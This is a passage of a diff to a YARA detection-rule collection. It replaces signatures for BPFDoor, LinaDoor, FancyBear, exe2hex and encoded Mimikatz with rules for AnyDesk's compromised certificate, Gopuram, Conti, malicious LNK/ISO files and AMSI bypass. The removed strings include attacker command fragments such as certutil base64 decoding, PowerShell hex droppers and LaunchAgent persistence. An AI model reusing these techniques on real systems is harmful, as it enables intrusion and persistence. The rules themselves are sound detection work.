-		$op2 = { 89 c2 8b 85 fc fe ff ff 01 c2 8b 45 f4 01 d0 2d 7b cf 10 2b 89 45 f4 c1 4d f4 10 }
-		$op3 = { e8 ?? d? ff ff 8b 45 f0 eb 12 8b 85 3c ff ff ff 89 c7 e8 ?? d? ff ff b8 ff ff ff ff c9 }
+		$a1 = "AnyDesk Software GmbH" wide
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 100KB and 2 of ( $opx* ) or 4 of them
+		uint16( 0 ) == 0x5a4d and not $a1 and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1" and pe.signatures [ i ] . serial == "0d:bf:15:2d:ea:f0:b9:81:a8:a9:38:d5:3f:76:9d:b8" )
 }
-rule SIGNATURE_BASE_APT_MAL_LNX_Redmenshen_Bpfdoor_Controller_May22_3 : FILE
+rule SIGNATURE_BASE_SUSP_Anydesk_Compromised_Certificate_Jan24_2 : FILE
 {
 	meta:
-		description = "Detects BPFDoor implants used by Chinese actor Red Menshen"
-		author = "Florian Roth (Nextron Systems)"
-		id = "91c2153a-a6e0-529e-852c-61f799838798"
-		date = "2022-05-08"
-		modified = "2023-12-05"
-		reference = "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lnx_implant_may22.yar#L102-L119"
+		description = "Detects binaries signed with a compromised signing certificate of AnyDesk that aren't AnyDesk itself (philandro Software GmbH, 0DBF152DEAF0B981A8A938D53F769DB8; permissive version)"
+		author = "Florian Roth"
+		id = "a41af8d8-ebdf-5a2f-8cf5-abd4587bdfc5"
+		date = "2024-02-02"
+		modified = "2024-04-24"
+		reference = "https://anydesk.com/en/public-statement"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_anydesk_compromised_cert_feb23.yar#L38-L56"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "afec0bfeddf5c5c2abc1a3173f636c385437e5d7c0b68665f6274011113a6a9c"
-		score = 85
+		logic_hash = "86f708233d5a6a46d367430dcc65b128e8dc7ec24eda774ff3860101cc16c9fc"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		hash1 = "144526d30ae747982079d5d340d1ff116a7963aba2e3ed589e7ebc297ba0c1b3"
-		hash2 = "fa0defdabd9fd43fe2ef1ec33574ea1af1290bd3d763fdb2bed443f2bd996d73"
 
 	strings:
-		$s1 = "hald-addon-acpi: listening on acpi kernel interface /proc/acpi/event" ascii fullword
-		$s2 = "/sbin/mingetty /dev" ascii fullword
-		$s3 = "pickup -l -t fifo -u" ascii fullword
+		$sc1 = { 0D BF 15 2D EA F0 B9 81 A8 A9 38 D5 3F 76 9D B8 }
+		$s2 = "DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1"
+		$f1 = "AnyDesk Software GmbH" wide
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 200KB and 2 of them or all of them
+		uint16( 0 ) == 0x5a4d and filesize < 20000KB and all of ( $s* ) and not 1 of ( $f* )
 }
-rule SIGNATURE_BASE_APT_MAL_LNX_Redmenshen_Bpfdoor_Controller_Generic_May22_1 : FILE
+
+rule SIGNATURE_BASE_SUSP_Anydesk_Compromised_Certificate_Jan24_3 : FILE
 {
 	meta:
-		description = "Detects BPFDoor malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d30df2ae-7008-53c0-9a61-8346a9c9f465"
-		date = "2022-05-09"
-		modified = "2023-12-05"
-		reference = "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lnx_implant_may22.yar#L121-L156"
+		description = "Detects binaries signed with a compromised signing certificate of AnyDesk after it was revoked (philandro Software GmbH, 0DBF152DEAF0B981A8A938D53F769DB8; version that uses dates for validation)"
+		author = "Florian Roth"
+		id = "9610e61c-25d7-53e8-ba3f-b78b3d108aa3"
+		date = "2024-02-02"
+		modified = "2024-04-24"
+		reference = "https://anydesk.com/en/public-statement"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_anydesk_compromised_cert_feb23.yar#L58-L77"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "57ae5f7dc1d202fe66d6626ef2bf2278b92bec0310449ce049bdaeaec5657c77"
-		score = 90
+		logic_hash = "fdd1068abfba52c9a40fd2b6628a5c67775eb31815e6d53bfc4655080d9b240e"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "07ecb1f2d9ffbd20a46cd36cd06b022db3cc8e45b1ecab62cd11f9ca7a26ab6d"
-		hash2 = "1925e3cd8a1b0bba0d297830636cdb9ebf002698c8fa71e0063581204f4e8345"
-		hash3 = "4c5cf8f977fc7c368a8e095700a44be36c8332462c0b1e41bff03238b2bf2a2d"
-		hash4 = "591198c234416c6ccbcea6967963ca2ca0f17050be7eed1602198308d9127c78"
-		hash5 = "599ae527f10ddb4625687748b7d3734ee51673b664f2e5d0346e64f85e185683"
-		hash6 = "5b2a079690efb5f4e0944353dd883303ffd6bab4aad1f0c88b49a76ddcb28ee9"
-		hash7 = "5faab159397964e630c4156f8852bcc6ee46df1cdd8be2a8d3f3d8e5980f3bb3"
-		hash8 = "76bf736b25d5c9aaf6a84edd4e615796fffc338a893b49c120c0b4941ce37925"
-		hash9 = "93f4262fce8c6b4f8e239c35a0679fbbbb722141b95a5f2af53a2bcafe4edd1c"
-		hash10 = "96e906128095dead57fdc9ce8688bb889166b67c9a1b8fdb93d7cff7f3836bb9"
-		hash11 = "97a546c7d08ad34dfab74c9c8a96986c54768c592a8dae521ddcf612a84fb8cc"
-		hash12 = "c796fc66b655f6107eacbe78a37f0e8a2926f01fecebd9e68a66f0e261f91276"
-		hash13 = "c80bd1c4a796b4d3944a097e96f384c85687daeedcdcf05cc885c8c9b279b09c"
-		hash14 = "f47de978da1dbfc5e0f195745e3368d3ceef034e964817c66ba01396a1953d72"
-		hash15 = "f8a5e735d6e79eb587954a371515a82a15883cf2eda9d7ddb8938b86e714ea27"
-		hash16 = "fa0defdabd9fd43fe2ef1ec33574ea1af1290bd3d763fdb2bed443f2bd996d73"
-		hash17 = "fd1b20ee5bd429046d3c04e9c675c41e9095bea70e0329bd32d7edd17ebaf68a"
-
-	strings:
-		$op1 = { c6 80 01 01 00 00 00 48 8b 45 ?8 0f b6 90 01 01 00 00 48 8b 45 ?8 88 90 00 01 00 00 c6 45 ?? 00 0f b6 45 ?? 88 45 }
-		$op2 = { 48 89 55 c8 48 8b 45 c8 48 89 45 ?? 48 8b 45 c8 0f b6 80 00 01 00 00 88 45 f? 48 8b 45 c8 0f b6 80 01 01 00 00 }
-		$op3 = { 48 89 45 ?? 48 8b 45 c8 0f b6 80 00 01 00 00 88 45 f? 48 8b 45 c8 0f b6 80 01 01 00 00 88 45 f? c7 45 f8 00 00 00 00 }
-		$op4 = { 48 89 7d d8 89 75 d4 48 89 55 c8 48 8b 45 c8 48 89 45 ?? 48 8b 45 c8 0f b6 80 00 01 00 00 88 45 f? }
-		$op5 = { 48 8b 45 ?8 c6 80 01 01 00 00 00 48 8b 45 ?8 0f b6 90 01 01 00 00 48 8b 45 ?8 88 90 00 01 00 00 c6 45 ?? 00 0f b6 45 }
-		$op6 = { 89 75 d4 48 89 55 c8 48 8b 45 c8 48 89 45 ?? 48 8b 45 c8 0f b6 80 00 01 00 00 88 45 f? 48 8b 45 c8 }
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 200KB and 2 of them or 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1" and pe.signatures [ i ] . serial == "0d:bf:15:2d:ea:f0:b9:81:a8:a9:38:d5:3f:76:9d:b8" and ( pe.signatures [ i ] . not_before > 1706486400 or pe.timestamp > 1706486400 ) )
 }
-rule SIGNATURE_BASE_Payload_Exe2Hex
+rule SIGNATURE_BASE_MAL_Gopuram_Apr23 : FILE
 {
 	meta:
-		description = "Detects payload generated by exe2hex"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c29e4937-cc6a-5265-a3b9-1018228dc956"
-		date = "2016-01-15"
+		description = "Detects Lazarus Gopuram malware"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e0bb43b0-542b-5c8e-bcba-0326f80efaa0"
+		date = "2023-04-04"
 		modified = "2023-12-05"
-		reference = "https://github.com/g0tmi1k/exe2hex"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/generic_exe2hex_payload.yar#L8-L28"
+		reference = "https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_gopuram.yar#L1-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "91b738f0174a267bbc900d59abcb504d2ae0bac8c287c3b7d1ebfc57374a7ee7"
-		score = 70
+		hash = "beb775af5196f30e0ee021790a4978ca7a7ac2a7cf970a5a620ffeb89cc60b2c"
+		hash = "97b95b4a5461f950e712b82783930cb2a152ec0288c00a977983ca7788342df7"
+		logic_hash = "58d978bd09a656f2a10a4d5d2585e51efe5cfb6b6648a4b3c2ce8c4f5d2256d4"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
 
 	strings:
-		$a1 = "set /p \"=4d5a" ascii
-		$a2 = "powershell -Command \"$hex=" ascii
-		$b1 = "set+%2Fp+%22%3D4d5" ascii
-		$b2 = "powershell+-Command+%22%24hex" ascii
-		$c1 = "echo 4d 5a " ascii
-		$c2 = "echo r cx >>" ascii
-		$d1 = "echo+4d+5a+" ascii
-		$d2 = "echo+r+cx+%3E%3E" ascii
+		$path = "%s.TxR.0.regtrans-ms"
 
 	condition:
-		all of ( $a* ) or all of ( $b* ) or all of ( $c* ) or all of ( $d* )
+		uint16( 0 ) == 0x5A4D and $path and filesize < 10MB
 }
-rule SIGNATURE_BASE_MAL_LNX_Linadoor_Rootkit_May22 : FILE
+rule SIGNATURE_BASE_MAL_CRIME_Suspicious_Hex_String_Jun21_1 : CRIME PE FILE
 {
 	meta:
-		description = "Detects LinaDoor Linux Rootkit"
-		author = "Florian Roth"
-		id = "e2f250b4-9a8a-5d70-83d7-5d12ad3763fb"
-		date = "2022-05-19"
-		modified = "2023-05-16"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lnx_linadoor_rootkit.yar#L2-L37"
+		description = "Triggers on parts of a big hex string available in lots of crime'ish PE files."
+		author = "Nils Kuhnert"
+		id = "2ad208fa-c7a5-5df9-96fe-4a84dc770f0f"
+		date = "2021-06-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_crime_unknown.yar#L1-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "546c34d4c204c7266884bb3b5b6ada418e83029ab88f72e5ffb094f50d9ed28e"
-		score = 85
+		logic_hash = "73144b14f3aa1a1d82df7710fa47049426bfbddeef75e85c8a0a559ad6ed05a3"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		hash1 = "25ff1efe36eb15f8e19411886217d4c9ec30b42dca072b1bf22f041a04049cd9"
-		hash2 = "4792e22d4c9996af1cb58ed54fee921a7a9fdd19f7a5e7f268b6793cdd1ab4e7"
-		hash3 = "9067230a0be61347c0cf5c676580fc4f7c8580fc87c932078ad0c3f425300fb7"
-		hash4 = "940b79dc25d1988dabd643e879d18e5e47e25d0bb61c1f382f9c7a6c545bfcff"
-		hash5 = "a1df5b7e4181c8c1c39de976bbf6601a91cde23134deda25703bc6d9cb499044"
-		hash6 = "c4eea99658cd82d48aaddaec4781ce0c893de42b33376b6c60a949008a3efb27"
-		hash7 = "c5651add0c7db3bbfe0bbffe4eafe9cd5aa254d99be7e3404a2054d6e07d20e7"
+		tags = "CRIME, PE, FILE"
+		hash1 = "37d60eb2daea90a9ba275e16115848c95e6ad87d20e4a94ab21bd5c5875a0a34"
+		hash2 = "3380c8c56d1216fe112cbc8f1d329b59e2cd2944575fe403df5e5108ca21fc69"
+		hash3 = "cd283d89b1b5e9d2875987025009b5cf6b137e3441d06712f49e22e963e39888"
+		hash4 = "404efa6fb5a24cd8f1e88e71a1d89da0aca395f82d8251e7fe7df625cd8e80aa"
+		hash5 = "479bf3fb8cff50a5de3d3742ab4b485b563b8faf171583b1015f80522ff4853e"
 
 	strings:
-		$s1 = "/dev/net/.../rootkit_/" ascii
-		$s2 = "did_exec" ascii fullword
-		$s3 = "rh_reserved_tp_target" ascii fullword
-		$s4 = "HIDDEN_SERVICES" ascii fullword
-		$s5 = "bypass_udp_ports" ascii fullword
-		$s6 = "DoBypassIP" ascii fullword
-		$op1 = { 74 2a 4c 89 ef e8 00 00 00 00 48 89 da 4c 29 e2 48 01 c2 31 c0 4c 39 f2 }
-		$op2 = { e8 00 00 00 00 48 89 da 4c 29 e2 48 01 c2 31 c0 4c 39 f2 48 0f 46 c3 5b }
-		$op3 = { 48 89 c3 74 2a 4c 89 ef e8 00 00 00 00 48 89 da 4c 29 e2 48 01 c2 31 c0 }
-		$op4 = { 4c 29 e2 48 01 c2 31 c0 4c 39 f2 48 0f 46 c3 5b 41 5c 41 5d }
-		$fp1 = "/wgsyncdaemon.pid"
+		$a1 = "07032114130C0812141104170C0412147F6A6A0C041F321104130C0412141104030C0412141104130C0412141104130C0412141104130C0412141104130C0412141104130C0412141104130C0412141122130C0412146423272A711221112B1C042734170408622513143D20262B0F323038692B312003271C170B3A2F286623340610241F001729210579223202642200087C071C17742417020620141462060F12141104130C0412141214001C0412011100160C0C002D2412130C0412141104130C04121A11041324001F140122130C0134171" ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 2000KB and 2 of them and not 1 of ( $fp* ) or 4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 10MB and all of them
 }
-rule SIGNATURE_BASE_MAL_OSX_Fancybear_Agent_Jul18_1 : FILE
+rule SIGNATURE_BASE_MAL_CRIME_Unknown_LNK_Jun21_1 : LNK POWERSHELL FILE
 {
 	meta:
-		description = "Detects FancyBear Agent for OSX"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ae717f70-7196-561a-916f-1598ab38c77a"
-		date = "2018-07-15"
+		description = "Triggers on malicious link files which calls powershell with an obfuscated payload and downloads an HTA file."
+		author = "Nils Kuhnert"
+		id = "d1aac420-fd91-5577-8efd-fcdd7f733981"
+		date = "2021-06-04"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/DrunkBinary/status/1018448895054098432"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fancybear_osxagent.yar#L1-L20"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_crime_unknown.yar#L18-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "099235424f22f3591a891726ea0c13ebf831fae0456ab1b6baba329c090a9535"
+		logic_hash = "460e764cbd9fbfa1a2156059d0042a0bea5a939d501050a733a789d236015d37"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d3be93f6ce59b522ff951cef9d59ef347081ffe33d4203cd5b5df0aaa9721aa2"
+		tags = "LNK, POWERSHELL, FILE"
+		hash1 = "8fc7f25da954adcb8f91d5b0e1967e4a90ca132b280aa6ae73e150b55d301942"
+		hash2 = "f5da192f4e4dfb6b728aee1821d10bec6d68fb21266ce32b688e8cae7898a522"
+		hash3 = "183a9b3c04d16a1822c788d7a6e78943790ee2cdeea12a38e540281091316e45"
+		hash4 = "a38c6aa3e1c429a27226519b38f39f03b0b1b9d75fd43cd7e067c5e542967afe"
+		hash5 = "455f7b6b975fb8f7afc6295ec40dae5696f5063d1651f3b2477f10976a3b67b2"
 
 	strings:
-		$x1 = "/Users/kazak/Desktop/" ascii
-		$s1 = "launchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist" fullword ascii
-		$s2 = "mkdir -p /Users/Shared/.local/ &> /dev/null" fullword ascii
-		$s3 = "chmod 755 /Users/Shared/start.sh" fullword ascii
-		$s4 = "chmod 755 %s/%s &> /dev/null" fullword ascii
-		$s6 = "chmod 755 /Users/Shared/.local/kextd" fullword ascii
+		$uid = "S-1-5-21-1437133880-1006698037-385855442-1004" wide
 
 	condition:
-		uint16( 0 ) == 0xfacf and filesize < 3000KB and ( 1 of ( $x* ) and 4 of them )
+		uint16( 0 ) == 0x004c and all of them
 }
-rule SIGNATURE_BASE_Gen_Base64_EXE : HIGHVOL FILE
+rule SIGNATURE_BASE_MAL_CRIME_Unknown_ISO_Jun21_1 : ISO POWERSHELL LNK FILE
 {
 	meta:
-		description = "Detects Base64 encoded Executable in Executable"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ef919a63-9a29-5624-a084-b92e3578e3a6"
-		date = "2017-04-21"
+		description = "Triggers on ISO files that mimick NOBELIUM TTPs, but uses LNK files that call powershell instead."
+		author = "Nils Kuhnert"
+		id = "73a1fc44-45c4-5253-b81d-fa6686dc0644"
+		date = "2021-06-04"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/general_cloaking.yar#L71-L90"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_crime_unknown.yar#L35-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6fe18ee727a836c0baaac4dbbffdb9f50065f56a4c6eeee7e54792a8a66229de"
+		logic_hash = "49b61f498d3f4ee249d9687277e581a39e08ebb4e1a293170058fb5f770bde1f"
 		score = 75
 		quality = 85
-		tags = "HIGHVOL, FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "ISO, POWERSHELL, LNK, FILE"
+		hash1 = "425dbed047dd2ce760d0848ebf7ad04b1ca360f111d557fc7bf657ae89f86d36"
+		hash2 = "f6944b6bca627e219d9c5065f214f95eb2226897a3b823b645d0fd78c281b149"
+		hash3 = "14d70a8bdd64e9a936c2dc9caa6d4506794505e0e3870e3a25d9d59bcafb046e"
+		hash4 = "9b2ca8eb6db34b07647a74171a5ff4c0a2ca8000da9876ed2db6361958c5c080"
 
 	strings:
-		$s1 = "TVpTAQEAAAAEAAAA//8AALgAAAA" wide ascii
-		$s2 = "TVoAAAAAAAAAAAAAAAAAAAAAAAA" wide ascii
-		$s3 = "TVqAAAEAAAAEABAAAAAAAAAAAAA" wide ascii
-		$s4 = "TVpQAAIAAAAEAA8A//8AALgAAAA" wide ascii
-		$s5 = "TVqQAAMAAAAEAAAA//8AALgAAAA" wide ascii
-		$fp1 = "BAM Management class library"
+		$uid = "S-1-5-21-1437133880-1006698037-385855442-1004" wide
+		$magic = "CD001" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 1 of ( $s* ) and not 1 of ( $fp* )
+		filesize < 5MB and all of them
 }
-rule SIGNATURE_BASE_Binary_Drop_Certutil : FILE
+rule SIGNATURE_BASE_Office_OLE_DDE : FILE
 {
 	meta:
-		description = "Drop binary as base64 encoded cert trick"
-		author = "Florian Roth (Nextron Systems)"
-		id = "19791e51-d041-524d-80fa-9f3ec54eb084"
-		date = "2015-07-15"
+		description = "Detects DDE in MS Office documents"
+		author = "NVISO Labs"
+		id = "2ead3cc9-f517-5916-93c9-1393362aa45d"
+		date = "2017-10-12"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/9DNn8q"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/general_cloaking.yar#L92-L107"
+		reference = "https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_dde_in_office_docs.yar#L48-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3e2b62442b5da6ab887e1eb03cdd44932651fa51ce11e87e6fc29015e708d2f3"
-		score = 70
-		quality = 85
+		logic_hash = "2d2f7dce166dc8ef8aba7e8eaafaf4d1bb34cdc1ce97d34125a65147cf5e08ac"
+		score = 50
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "echo -----BEGIN CERTIFICATE----- >" ascii
-		$s1 = "echo -----END CERTIFICATE----- >>" ascii
-		$s2 = "certutil -decode " ascii
+		$a = /\x13\s*DDE\b[^\x14]+/ nocase
+		$r1 = { 52 00 6F 00 6F 00 74 00 20 00 45 00 6E 00 74 00 72 00 79 }
+		$r2 = "Adobe ARM Installer"
 
 	condition:
-		filesize < 10KB and all of them
+		uint32be( 0 ) == 0xD0CF11E0 and $a and not 1 of ( $r* )
 }
-rule SIGNATURE_BASE_Stegokatz : FILE
-{
-	meta:
-		description = "Encoded Mimikatz in other file types"
-		author = "Florian Roth (Nextron Systems)"
-		id = "78868bb0-af69-573d-afd2-350a46f69137"
-		date = "2015-09-11"
+rule SIGNATURE_BASE_MAL_RANSOM_Conticrypter
+{
+	meta:
+		description = "Signature for a crypter associated with Conti"
+		author = "James Quinn, Binary Defense"
+		id = "f2a00655-41a2-5614-9c29-3629c93c0e95"
+		date = "2021-03-17"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/jWPBBY"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/general_cloaking.yar#L109-L123"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_conti.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "091b07220d2a89822aa382edcecf5869d463e375747cc41f52417e66ccf0e2da"
-		score = 70
+		logic_hash = "256fbd028a91da45049e2e861e16e97201f09cb92ab049eda373c80e6a796726"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		tlp = "White"
 
 	strings:
-		$s1 = "VC92Ny9TSXZMNk5jLy8vOUlqUTFVRlFNQTZMLysvdjlJaTh2L0ZUNXJBUUJJaTFRa1NFaUx6K2hWSS8vL1NJME44bklCQU9pZC92Ny9USTJjSkpBQUFBQXp3RW1MV3hCSmkyc1lTWXR6S0VtTDQxL0R6TXhNaTl4SmlWc0lUWWxMSUUySlF4aFZWbGRCVkVGVlFWWkJWMGlCN1BBQUFBQklnMlFrYUFDNE1BQUFBRW1MNkVTTmNPQ0pSQ1JnaVVRa1pFbU5RN0JKaTlsTWpRWFBGQU1BU0ls" ascii
-		$s2 = "Rpd3ovN3FlalVtNklLQ0xNNGtOV1BiY0VOVHROT0Zud25CWGN0WS9BcEdMR28rK01OWm85Nm9xMlNnY1U5aTgrSTBvNkFob1FOTzRHQWdtUElEVmlqald0Tk90b2FmN01ESWJUQkF5T0pYbTB4bFVHRTBZWEFWOXVoNHBkQnRrS0VFWWVBSEE2TDFzU0c5a2ZFTEc3QWd4WTBYY1l3ZzB6QUFXS09JZE9wQVhEK3lnS3lsR3B5Q1ljR1NJdFNseGZKWUlVVkNFdEZPVjRJUldERUl1QXpKZ2pCQWdsd0Va" ascii
+		$handoff1 = {4C 8D 05 ?? ?? ?? ?? 48 C7 44 24 28 00 00 00 00 C7 44 24 20 00 00 00 00 e8}
+		$handoff2 = {C7 ?? 24 ?? 00 00 00 00 89 44 24 ?? C7 ?? 24 ?? ?? ?? ?? ?? C7 ?? 24 ?? 00 00 00 00 }
+		$garbageLoad1 = {53 48 83 EC 20 89 CB 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 01 D8 48 83 C4 20 5B C3}
+		$garbageLoad2 = {55 89 E5 83 EC 18 C7 ?? 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 03 45 08 52 C9 C3}
 
 	condition:
-		filesize < 1000KB and 1 of them
+		1 of ( $handoff* ) and 1 of ( $garbageLoad* )
 }
-rule SIGNATURE_BASE_Obfuscated_VBS_April17 : FILE
+
+rule SIGNATURE_BASE_Datper_Backdoor : FILE
 {
 	meta:
-		description = "Detects cloaked Mimikatz in VBS obfuscation"
+		description = "Detects Datper Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ca60b885-bb56-55ee-a2b3-dea6958883c2"
-		date = "2017-04-21"
+		id = "547db8bb-cc02-5521-8b85-845b1652fee9"
+		date = "2017-08-21"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/general_cloaking.yar#L125-L137"
+		reference = "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_tick_datper.yar#L13-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "590dca22a4fcbc2bbfb4358c53f7cb6c06824970139cca251c4cf1bd435817b0"
+		logic_hash = "eacdc648226f20fa3847f0b5e8cafcee59cc1c6274cabb885db297f5b5fceafb"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7d70d659c421b50604ce3e0a1bf423ab7e54b9df361360933bac3bb852a31849"
+		hash2 = "331ac0965b50958db49b7794cc819b2945d7b5e5e919c185d83e997e205f107b"
+		hash3 = "90ac1fb148ded4f46949a5fea4cd8c65d4ea9585046d66459328a5866f8198b2"
+		hash4 = "12d9b4ec7f8ae42c67a6fd030efb027137dbe29e63f6f669eb932d0299fbe82f"
+		hash5 = "2384e8ad8eee6db1e69b3ee7b6b3d01ae09f99a86901a0a87fb2788c1115090c"
+		hash6 = "1e511c32cdf8abe23d8ba7c39da5ce7fc6c87fdb551c9fc3265ee22ac4076e27"
+		hash7 = "7bc042b9a599e1024a668b9921e2a42a02545429cf446d5b3d21f20185afa6ce"
 
 	strings:
-		$s1 = "::::::ExecuteGlobal unescape(unescape(" ascii
+		$s1 = "RtlGetCo" fullword ascii
+		$s2 = "hutils" fullword ascii
+		$s3 = "kza2FWU,f;\"3U&zpa3U(W`J" fullword ascii
+		$c1 = "dkkwldngn" fullword ascii
+		$c2 = "ndkkwqgcm" fullword ascii
 
 	condition:
-		filesize < 500KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "58db98e2334746d349d607e4d73bc5ea" or pe.imphash ( ) == "8fbed921458af485ce84fb7d9b13899e" or ( 2 of ( $s* ) and 1 of ( $c* ) ) or ( $s3 and $c1 ) ) )
 }
-rule SIGNATURE_BASE_Obfuscated_JS_April17 : FILE
+rule SIGNATURE_BASE_PS_AMSI_Bypass : FILE
 {
 	meta:
-		description = "Detects cloaked Mimikatz in JS obfuscation"
+		description = "Detects PowerShell AMSI Bypass"
 		author = "Florian Roth (Nextron Systems)"
-		id = "44abd2c0-5f8d-5a8c-b282-a09853e12054"
-		date = "2017-04-21"
+		id = "31ab8932-4c74-5251-a044-3fcc0aa159f4"
+		date = "2017-07-19"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/general_cloaking.yar#L139-L153"
+		reference = "https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_scripts.yar#L4-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c75bf0ad8dd35fabbaedb54c2630249497edbb215b6ce2b707e32f82e8fb8f56"
-		score = 75
